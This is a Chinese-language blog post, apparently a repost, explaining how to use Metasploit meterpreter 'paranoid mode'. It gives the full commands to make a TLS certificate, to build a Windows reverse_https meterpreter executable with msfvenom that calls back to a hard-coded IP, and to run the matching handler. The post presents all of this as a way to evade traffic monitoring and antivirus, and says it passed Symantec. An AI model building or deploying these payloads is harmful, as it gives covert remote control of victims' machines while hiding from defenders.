MSF偏执模式

发表于 更新于 分类于 阅读次数:
本文字数: 1.8k 阅读时长 ≈ 2 分钟

MSF偏执模式

在某些环境下,我们需要用到meterpreter的偏执模式(paranoid mode)。

偏执模式在面对接受的请求很多的时候,可以有效过滤筛选回连的请求,只留下自己所需要的。

同时,因为其使用了SSL/TLS 认证,因此在应对流量监控和分析时,有很不错的效果,当然也能够Bypass av(by data stream)。

可用负载:

1
2
3
4
5
6
7
8
Staged (payload.bat|ps1|txt|exe):
windows/meterpreter/reverse_winhttps
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https

Stageless (binary.exe):
windows/meterpreter_reverse_https
windows/x64/meterpreter_reverse_https

创建一个SSL/TLS证书

在kali或者其他带有openssl的环境下:

1
2
3
4
5
6
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
    -subj "/C=US/ST=Texas/L=Austin/O=Development/CN=118.25.69.199" \
    -keyout hack.key \
    -out hack.crt && \
cat hack.key  hack.crt > hack.pem && \
rm -f hack.key  hack.crt

你可以把green-m.github.io这个URL改成任意你想回连的地址,直接指定相应IP也可以。

如果你能搞到一个受信任的证书颁发机构签名的SSL/TLS证书,那就碉堡了,流量直接畅通无阻。

生成偏执模式的payload

1
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=118.25.69.199 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=./hack.pem StagerVerifySSLCert=true PayloadUUIDName=Wh0ale -f exe -o ./hack.exe

通过设置PayloadUUIDTracking和PayloadUUIDName可以在监听的时候过滤掉不需要的回连请求。为了Bypass av的需求,你还可以生成shellcode来自己编译。

如果网络环境不好,你还可以使用stageless的payload,-p参数指定windows/meterpreter_reverse_https,其他不用修改。

监听偏执模式

1
2
3
4
5
6
7
8
9
10
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_winhttps
set LHOST green-m.github.io
set LPORT 443
set HandlerSSLCert ./hack.pem
set IgnoreUnknownPayloads true
set StagerVerifySSLCert true
set exitonsession false
run -j -z

设置HandlerSSLCert和StagerVerifySSLCert参数来使用TLS pinning,IgnoreUnknownPayloads接受白名单的payload。

同上,stageless 修改相应payload。

总结:偏执模式基于SSL/TLS认证过某些流量监控效果应该很不错,测试也过了symantec,仅供参考。

参考文章:https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode#create-a-ssltls-certificate

转载:https://green-m.github.io/2016/11/23/msf-paranoid-mode/

-------------本文结束感谢您的阅读-------------